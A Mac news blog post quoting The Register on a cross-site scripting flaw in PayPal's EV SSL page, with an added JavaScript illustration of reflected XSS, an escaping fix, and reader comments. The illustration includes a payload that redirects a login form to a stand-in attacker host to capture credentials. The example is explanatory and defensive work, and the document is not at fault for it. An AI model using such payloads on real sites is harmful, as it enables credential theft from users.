And they wanted to block Safari: PayPal’s EV SSL page and its vaunted green URL vulnerable to attack

“A serious scripting error has been discovered on PayPal that could enable attackers to create convincing spoof pages that steal users’ authentication credentials,” Dan Goodin reports for The Register.

“The cross-site scripting bug is made all the more critical because it resides on a page that uses an extended validation secure sockets layer certificate. The new-fangled SSL mechanism is designed to give users a higher degree of confidence that the page they’re visiting is secure by turning their browser address bar green,” Goodin reports.

“But Finnish researcher Harry Sintonen figured out a way to inject his own code into a supposedly protected PayPal page even as the green bar lulled visitors into believing it hadn’t been tampered with,” Goodin reports.

“The discovery is one more reason to remain skeptical of extended validation SSL, which has always struck us as a solution in search of a problem. Yes, we know it’s supposed to close a loophole that’s long existed in SSL by certifying, in this case for example, that it is eBay (the parent company of PayPal) that owns the SSL certificate for the specific PayPal page. But we’ve not yet heard of a single attack involving a forged certificate, so we’re tempted to think the measure is more gimmick designed to generate revenue for VeriSign and its competitors than anything else,” Goodin reports.

“eBay security pros seem to have drunk the EV SSL Kool Aid, however, having announced recently that browsers that don’t support the new standard [includes Apple’s Safari for Mac and Windows] aren’t welcome on the PayPal site,” Goodin reports.

Full article here.
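The mechanics the article describes are worth seeing in code, because they explain why the green bar is beside the point: an EV certificate authenticates the server you are talking to, but a cross-site scripting bug lets attacker-supplied markup execute inside that authenticated page, in its origin, with access to its forms and cookies. The following is an added illustration, not PayPal’s code and not taken from The Register; the page template, the function names and the `attacker.example` host are assumptions made for the example.

```javascript
// Added example (not PayPal's code): a login page that reflects a query
// parameter into its HTML, first without output encoding (the XSS-prone
// pattern) and then with it. Whether the page was served under an EV
// certificate makes no difference to either version.

// Vulnerable pattern: the reflected value is concatenated straight into markup.
function renderLoginVulnerable(user) {
  return `<form action="/login" method="post">
  Welcome back, ${user}. <input name="password" type="password">
</form>`;
}

// Minimal HTML entity encoder for text placed in element content or in a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened pattern: same template, reflected value encoded before insertion.
function renderLoginSafe(user) {
  return `<form action="/login" method="post">
  Welcome back, ${escapeHtml(user)}. <input name="password" type="password">
</form>`;
}

// Crude reviewer's check over rendered output: did a raw <script> element or
// an inline event-handler attribute survive into the markup?
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /\son[a-z]+\s*=/i.test(html);
}

// Constructed payload of the kind an attacker would place in the URL. It
// repoints the real login form at an attacker-controlled host (hypothetical
// name), while the address bar still shows the genuine, EV-certified site.
const PAYLOAD =
  '<script>document.forms[0].action="https://attacker.example/steal"</script>';

// Demonstration when run directly: node xss_ev.js
console.log("vulnerable page carries active content:", containsActiveContent(renderLoginVulnerable(PAYLOAD)));
console.log("hardened page carries active content:  ", containsActiveContent(renderLoginSafe(PAYLOAD)));
```

The encoder is deliberately context-specific: it is correct for element text and double-quoted attributes, and would not be sufficient on its own for a value dropped inside a `<script>` block, a URL, or a CSS context, each of which needs its own encoding.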


Here’s what we wrote a month ago, in part: “Should Apple add EV SSL to Safari? Maybe, maybe not; regardless it’s really no substitute for users’ common sense. What’s next, anyway, XL SSL? XXL? SuperSized? Puleeze… PayPal is not your mommy, users need to be responsible for themselves, and EV certificates are a scam designed to extract more money from website operators under the guise of more security.”


  1. Be NICE, guys and gals … they are trying to do the right thing(s). It didn’t work out, but the motivation showed their heart was in the right place. Unlike MS, where the question is: is their heart a) black or b) missing?

    Sure, we can laugh at them, but … is there really any way to be 100% sure your web interaction is safe and secure? I don’t think so. You do your best and pray.

  2. Rather than chasing after a new revenue stream, why don’t these folks concentrate on actually making SSL more secure, so this kind of thing can’t happen?

    The fact that PayPal seemed so convinced that EVil SSL was more secure than it really is, has me concerned about where exactly their focus is: securing users’ data, or making more money for the folks behind EVil SSL?

  3. @ DLMeyer:

    Indeed. I want to be here when the Mac – yes, WHEN – gets an exploit that hoses people.
    You think any OS/platform is perfect?
    If you do, you better be prepared for the 9/11 that will someday hit your smartasses.

    We’ve been lucky.
    It won’t last forever.
    Will you be so smug then?

    “Dumbasses” is right – MDN and some of its visitors

  4. PayPal is not your mommy, users need to be responsible for themselves

    Fair enough. So how do you know if you’re being spoofed (by a good spoofer, that is)? Not all of us have/use packet sniffers.

    Where there’s money, there’s crime. Perhaps high-value targets like PayPal should consider dedicated client software, versus browser access? (Nothing against Safari, this has to do with SSL)

  5. PayPal never said they wanted to block Safari, you silly, silly fools. MDN, get your facts straight before you post any more bile.

    At least think before you make any comments. The 20 minute page load times on this site should give you plenty of opportunity to do that.

    MDN, the Dvorak of the Mac news sites.
